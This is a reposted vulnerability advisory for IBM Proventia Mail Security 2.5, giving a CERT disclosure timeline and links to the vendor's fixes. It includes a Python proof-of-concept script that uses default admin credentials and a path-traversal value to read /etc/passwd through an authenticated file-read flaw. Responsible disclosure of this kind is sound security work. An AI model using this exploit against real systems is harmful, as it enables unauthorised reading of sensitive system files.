Author: muts of Offensive Security
Product: IBM ISS Proventia Mail Security
Version: 2.5
Vendor Site: http://www.ibm.com/us/en/
Product Page: http://www-935.ibm.com/services/us/en/it-services/proventia-network-mail-security-system.html


04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
19 Jul 2012: Reflected XSS Fixed: http://www-01.ibm.com/support/docview.wss?uid=swg21605626
19 Jul 2012: Arbitrary File Read Fixed: http://www-01.ibm.com/support/docview.wss?uid=swg21605630
08 Aug 2012: Public Disclosure

The application is vulnerable to a post-authentication reflected XSS:

In addition, there is also a post-authentcation arbitary file-reading vulnerability. The proof of concept code below can be used to replicate the vulnerability.


# IBM Proventia Network Mail Security System POST file read

import urllib
import urllib2
import httplib

username = "admin"
password = "admin"

url = ""

password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, "", username, password)
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
data = urllib.urlencode({'template' : '../../../../../etc/passwd','async' : '3','access' : 'direct'})
req = urllib2.Request(url, data)
f = opener.open(req)
print f.read()
Rate this post
Брой прочитания на тази страница: 1041
IBM Proventia Network Mail Security System 2.5 POST File Read

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *